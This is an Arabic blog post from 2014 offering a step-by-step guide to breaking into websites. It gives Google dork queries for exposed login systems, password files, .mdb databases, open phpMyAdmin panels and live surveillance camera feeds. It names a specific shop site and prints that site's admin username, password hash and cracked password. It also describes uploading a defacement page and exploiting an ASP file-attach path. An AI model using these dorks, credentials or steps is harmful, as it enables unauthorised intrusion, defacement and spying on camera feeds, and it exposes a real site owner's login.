الجمعة، 21 نوفمبر 2014



الكثير من الظواهر التي تحدث ، والمتعلقة باختراقات المواقع بمختلف أنواعها أي يضع لك رابط دخول للموقع وإسم مستخدم وكلمة سر الخاص بالموقع , أو حتى يقوم برفع أندكس خاص به في الموقع .

فلا يدع لك أي فرصة في شك بمصداقيته .....
سوف أحاول التطرق في هذه التدوينة إلى أهم الطرق التي يستعملها أطفال الهكرز في إختراق المواقع .
الطريقة الأولى
تابع هذا الشرح جيدا لأني لن أعيد شرحه في الطرق .
هي نفس الطريقة تتكر فقط .
أولا نقوم بالدخول لــ Goolge
ثم نكتب بخانة البحث
intext:-Micro Login System v 1.0
سيضهر لنا مواقع كثيرة اختار اي موقع
يسضهر لك لوحة تحكم وتطلب منك ادخال الاسم والرمز
مثلا:http://www.daydreamislandshop.com/images-hr/login.phpنضع بدلا من login.php
نضع :userpwd.txt
اي ان الموقع يكون : http://www.daydreamislandshop.com/images-hr/userpwd.txtالان سيظهر لنا هكذا mjb:7fd5838d304500a212ce6e348ea81583
mjb وهو اسم الادارة
7fd5838d304500a212ce6e348ea81583 وهو الرقم السري ولكن مشفر
اذهب اللى موقع md5decrypter
وضع الرمز المشفر فك التشفير
إذا رابط الموقع
http://www.daydreamislandshop.com/images-hr/login.phpإسم المستخدم : mjb
كلمة السر : roadster
الخدعة الثانية
تما ما مثل الأولى فقط عند دخول لgoogle
أكتب : inurl:news/admin.htm
ونستبدل admin.htm
بـ news.mdb
( إذا قام بتحميل الملف ,فقط إفتح ب المفكرة وستجد إسم المستخد وكلمة السر )
وبعدها إرجع للموقع وأدخل اليوزر والباسورد
الطريقة الثالثة
هذه الطريقة أسهل حيث تدخل لبانل الموقع مباشرتا
أدخل لgoogle أكتب هذا الكود
inurl:"phpmyadmin/index.php" intext:"[ Edit ] [ Create PHP Code ] [ Refresh
بعد دخول لأي موقع ستجد نفسك في لوحة تحكم
يمكنك رفع عليه أندكس الخاص بك أو أي شيئ
طريقة إختراق كميرات المراقبة
هذه الطريقة تحتاج إلى أن تكون مثبت java على جهازك
يمكنك تحميله من الموقع الرسمي
إضغط هنا للتحميل
ثم نذهب لـ google ونكتب
intitle:liveapplet inurl:LvAppl
شرح بالفيديو : من هنا طريقة رفع أندكس على موقع
حتى هذه الطريقة بسيطة أيضا لكن سأضع فيديو يشرح الطريقة
الأكواد التس ستحتاجها
الأول : inurl:"admin/my_documents/my_files"
استغلال الثغره : admin/rte_popup_file_atch.asp
هذا رابط الفيديو
من هنا الى اللقاء في شرح جديد 

جميع الحقوق محفوظة ل مدونة الاصبحي